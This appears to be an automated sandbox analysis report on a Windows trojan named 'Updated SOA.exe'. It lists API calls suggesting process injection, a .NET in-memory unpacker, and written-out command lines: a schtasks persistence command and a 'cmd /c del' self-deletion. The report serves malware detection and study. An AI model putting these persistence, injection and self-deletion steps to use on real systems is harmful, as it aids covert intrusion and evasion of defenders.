          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00408C4B7_2_00408C4B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00408C907_2_00408C90
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041CCB87_2_0041CCB8
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00402D897_2_00402D89
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107F9007_2_0107F900
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010941207_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011310027_2_01131002
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114E8247_2_0114E824
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A8307_2_0109A830
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108B0907_2_0108B090
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A07_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011420A87_2_011420A8
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011428EC7_2_011428EC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A3097_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01142B287_2_01142B28
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AB407_2_0109AB40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0111CB4F7_2_0111CB4F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AEBB07_2_010AEBB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113DBD27_2_0113DBD2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011303DA7_2_011303DA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AABD87_2_010AABD8
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E37_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112FA2B7_2_0112FA2B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B2367_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011422AE7_2_011422AE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01142D077_2_01142D07
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01070D207_2_01070D20
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01141D557_2_01141D55
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A25817_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D827_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011425DD7_2_011425DD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108D5E07_2_0108D5E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108841F7_2_0108841F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113D4667_2_0113D466
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B4777_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011344967_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114DFCE7_2_0114DFCE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01141FF17_2_01141FF1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113D6167_2_0113D616
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01096E307_2_01096E30
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01142EF77_2_01142EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E841F18_2_043E841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449D46618_2_0449D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449449618_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D0D2018_2_043D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A1D5518_2_044A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A2D0718_2_044A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A25DD18_2_044A25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440258118_2_04402581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D8218_2_04492D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043ED5E018_2_043ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F6E3018_2_043F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449D61618_2_0449D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A2EF718_2_044A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044ADFCE18_2_044ADFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A1FF118_2_044A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FA83018_2_043FA830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449100218_2_04491002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044AE82418_2_044AE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A28EC18_2_044A28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043EB09018_2_043EB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044020A018_2_044020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A20A818_2_044A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F412018_2_043F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043DF90018_2_043DF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F99BF18_2_043F99BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0448FA2B18_2_0448FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494AEF18_2_04494AEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A22AE18_2_044A22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FA30918_2_043FA309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A2B2818_2_044A2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FAB4018_2_043FAB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044903DA18_2_044903DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440ABD818_2_0440ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449DBD218_2_0449DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044823E318_2_044823E3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440EBB018_2_0440EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013C98318_2_0013C983
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D1E918_2_0013D1E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D24718_2_0013D247
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D35218_2_0013D352
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CB6E18_2_0013CB6E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CBE618_2_0013CBE6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00128C4B18_2_00128C4B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00128C9018_2_00128C90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CCB818_2_0013CCB8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122D9018_2_00122D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122D8918_2_00122D89
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122FB018_2_00122FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043DB150 appears 133 times
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: String function: 0107B150 appears 136 times
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004185D0 NtCreateFile,7_2_004185D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418680 NtReadFile,7_2_00418680
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418700 NtClose,7_2_00418700
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004187B0 NtAllocateVirtualMemory,7_2_004187B0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004185CA NtCreateFile,7_2_004185CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041867A NtReadFile,7_2_0041867A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418623 NtReadFile,7_2_00418623
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004186FA NtClose,7_2_004186FA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004187AA NtAllocateVirtualMemory,7_2_004187AA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_010B9910
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B99A0 NtCreateSection,LdrInitializeThunk,7_2_010B99A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9840 NtDelayExecution,LdrInitializeThunk,7_2_010B9840
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_010B9860
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B98F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_010B98F0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_010B9A00
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A20 NtResumeThread,LdrInitializeThunk,7_2_010B9A20
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A50 NtCreateFile,LdrInitializeThunk,7_2_010B9A50
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9540 NtReadFile,LdrInitializeThunk,7_2_010B9540
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B95D0 NtClose,LdrInitializeThunk,7_2_010B95D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9710 NtQueryInformationToken,LdrInitializeThunk,7_2_010B9710
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9780 NtMapViewOfSection,LdrInitializeThunk,7_2_010B9780
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B97A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_010B97A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9FE0 NtCreateMutant,LdrInitializeThunk,7_2_010B9FE0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_010B9660
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_010B96E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9950 NtQueueApcThread,7_2_010B9950
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B99D0 NtCreateProcessEx,7_2_010B99D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9820 NtEnumerateKey,7_2_010B9820
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BB040 NtSuspendThread,7_2_010BB040
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B98A0 NtWriteVirtualMemory,7_2_010B98A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9B00 NtSetValueKey,7_2_010B9B00
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA3B0 NtGetContextThread,7_2_010BA3B0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A10 NtQuerySection,7_2_010B9A10
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A80 NtOpenDirectoryObject,7_2_010B9A80
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9520 NtWaitForSingleObject,7_2_010B9520
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BAD30 NtSetContextThread,7_2_010BAD30
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9560 NtWriteFile,7_2_010B9560
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B95F0 NtQueryInformationFile,7_2_010B95F0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA710 NtOpenProcessToken,7_2_010BA710
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9730 NtQueryVirtualMemory,7_2_010B9730
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9760 NtOpenProcess,7_2_010B9760
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA770 NtOpenThread,7_2_010BA770
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9770 NtSetInformationFile,7_2_010B9770
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9610 NtEnumerateValueKey,7_2_010B9610
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9650 NtQueryValueKey,7_2_010B9650
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9670 NtQueryInformationProcess,7_2_010B9670
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B96D0 NtCreateKey,7_2_010B96D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419540 NtReadFile,LdrInitializeThunk,18_2_04419540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044195D0 NtClose,LdrInitializeThunk,18_2_044195D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419650 NtQueryValueKey,LdrInitializeThunk,18_2_04419650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04419660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044196D0 NtCreateKey,LdrInitializeThunk,18_2_044196D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044196E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_044196E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419710 NtQueryInformationToken,LdrInitializeThunk,18_2_04419710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419FE0 NtCreateMutant,LdrInitializeThunk,18_2_04419FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419780 NtMapViewOfSection,LdrInitializeThunk,18_2_04419780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419840 NtDelayExecution,LdrInitializeThunk,18_2_04419840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04419860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04419910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044199A0 NtCreateSection,LdrInitializeThunk,18_2_044199A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A50 NtCreateFile,LdrInitializeThunk,18_2_04419A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419560 NtWriteFile,18_2_04419560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419520 NtWaitForSingleObject,18_2_04419520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441AD30 NtSetContextThread,18_2_0441AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044195F0 NtQueryInformationFile,18_2_044195F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419670 NtQueryInformationProcess,18_2_04419670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419610 NtEnumerateValueKey,18_2_04419610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419760 NtOpenProcess,18_2_04419760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A770 NtOpenThread,18_2_0441A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419770 NtSetInformationFile,18_2_04419770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A710 NtOpenProcessToken,18_2_0441A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419730 NtQueryVirtualMemory,18_2_04419730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044197A0 NtUnmapViewOfSection,18_2_044197A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441B040 NtSuspendThread,18_2_0441B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419820 NtEnumerateKey,18_2_04419820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044198F0 NtReadVirtualMemory,18_2_044198F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044198A0 NtWriteVirtualMemory,18_2_044198A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419950 NtQueueApcThread,18_2_04419950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044199D0 NtCreateProcessEx,18_2_044199D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A00 NtProtectVirtualMemory,18_2_04419A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A10 NtQuerySection,18_2_04419A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A20 NtResumeThread,18_2_04419A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A80 NtOpenDirectoryObject,18_2_04419A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419B00 NtSetValueKey,18_2_04419B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A3B0 NtGetContextThread,18_2_0441A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001385D0 NtCreateFile,18_2_001385D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138680 NtReadFile,18_2_00138680
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138700 NtClose,18_2_00138700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001387B0 NtAllocateVirtualMemory,18_2_001387B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001385CA NtCreateFile,18_2_001385CA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00138623 NtReadFile,18_2_00138623
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013867A NtReadFile,18_2_0013867A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001386FA NtClose,18_2_001386FA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_001387AA NtAllocateVirtualMemory,18_2_001387AA
          Source: Updated SOA.exe, 00000000.00000002.238611613.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exe, 00000000.00000002.242738068.0000000007390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Updated SOA.exe
          Source: Updated SOA.exe, 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnumerable.dlln' vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000002.300574008.00000000012FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000002.300276380.0000000000FD9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs Updated SOA.exe
          Source: Updated SOA.exe, 00000007.00000000.237925676.0000000000582000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exeBinary or memory string: OriginalFilenameTypeEnt.exe2 vs Updated SOA.exe
          Source: Updated SOA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oydxFbGhGlh.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Updated SOA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: oydxFbGhGlh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Updated SOA.exeVirustotal: Detection: 31%
          Source: Updated SOA.exeReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\Updated SOA.exeFile read: C:\Users\user\Desktop\Updated SOA.exeJump to behavior
          Source: Updated SOA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Updated SOA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Updated SOA.exe 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Users\user\Desktop\Updated SOA.exe C:\Users\user\Desktop\Updated SOA.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Users\user\Desktop\Updated SOA.exe C:\Users\user\Desktop\Updated SOA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Updated SOA.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeFile created: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exeJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeFile created: C:\Users\user\AppData\Local\Temp\tmp14E0.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@10/8
          Source: C:\Users\user\Desktop\Updated SOA.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeMutant created: \Sessions\1\BaseNamedObjects\CKRUNQbnNejvlYEsYr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Updated SOA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Updated SOA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Updated SOA.exe, 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, cmmon32.exe, 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Updated SOA.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Updated SOA.exe, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: oydxFbGhGlh.exe.0.dr, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.cs.Net Code: UPPWI65jo9 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0106E6B0 push eax; iretd 0_2_0106FEB1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B87C push eax; ret 7_2_0041B882
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B812 push eax; ret 7_2_0041B818
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B81B push eax; ret 7_2_0041B882
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041CBE6 push dword ptr [2E339416h]; ret 7_2_0041CCB6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B7C5 push eax; ret 7_2_0041B818
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010CD0D1 push ecx; ret 7_2_010CD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0442D0D1 push ecx; ret 18_2_0442D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B812 push eax; ret 18_2_0013B818
